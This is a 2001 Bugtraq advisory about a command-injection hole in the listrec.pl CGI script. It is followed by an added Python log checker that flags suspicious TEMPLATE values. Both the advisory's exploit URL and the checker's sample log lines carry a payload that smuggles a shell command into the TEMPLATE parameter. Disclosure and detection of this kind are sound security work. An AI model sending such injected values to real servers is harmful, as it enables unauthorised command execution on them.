Textor Webmasters Ltd (listrec.pl)

From: Alexey Sintsov (don_huan@xakep.ru)
Date: 09/12/01


Date: 12 Sep 2001 04:01:24 -0000
Message-ID: <20010912040124.2862.qmail@securityfocus.com>
From: Alexey Sintsov <don_huan@xakep.ru>
To: bugtraq@securityfocus.com
Subject: Textor Webmasters Ltd (listrec.pl)

Last update (of listrec.pl) Jon Wright 11/11/1998.

This script has a vulnerability (it does not filter the user's input)
which allows commands to be carried out from the web server.

EXPLOIT:
www.server.com/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls|

XP-TEAM
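
Added example (not part of the original post, and not the vendor's code): a log check for the request pattern reported above, which flags any listrec.pl request whose TEMPLATE value falls outside an allowlist. The allowlist pattern, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: legitimate TEMPLATE values are simple names such as "news" or "news.tpl".
SAFE_TEMPLATE = re.compile(r"[A-Za-z0-9_-]{1,64}(?:\.[A-Za-z0-9]{1,8})?")
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')

def template_values(target):
    """Decoded TEMPLATE values of a request to listrec.pl, else an empty list."""
    parts = urlsplit(target)
    if not unquote_plus(parts.path).lower().endswith("/listrec.pl"):
        return []
    values = []
    # Split on "&" only, so a ";" inside a value stays part of that value.
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == "TEMPLATE":
            values.append(unquote_plus(value))
    return values

def suspicious_requests(log_lines):
    """Return (line_number, value) for every TEMPLATE value outside the allowlist."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue  # not a recognisable request line
        for value in template_values(match.group(1)):
            if not SAFE_TEMPLATE.fullmatch(value):
                hits.append((number, value))
    return hits

# Constructed sample access-log lines (Common Log Format), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Sep/2001:04:10:01 +0000] "GET /cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=news HTTP/1.0" 200 5120',
    '192.0.2.44 - - [12/Sep/2001:04:12:37 +0000] "GET /cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls| HTTP/1.0" 200 812',
    '192.0.2.44 - - [12/Sep/2001:04:12:59 +0000] "GET /cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=%3Bls%7C HTTP/1.0" 200 812',
    '192.0.2.71 - - [12/Sep/2001:04:15:20 +0000] "GET /index.html?TEMPLATE=;ls| HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: TEMPLATE={value!r} is outside the allowlist")
```

Because the check is an allowlist rather than a list of bad characters, percent-encoded variants of the same value are flagged as well.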


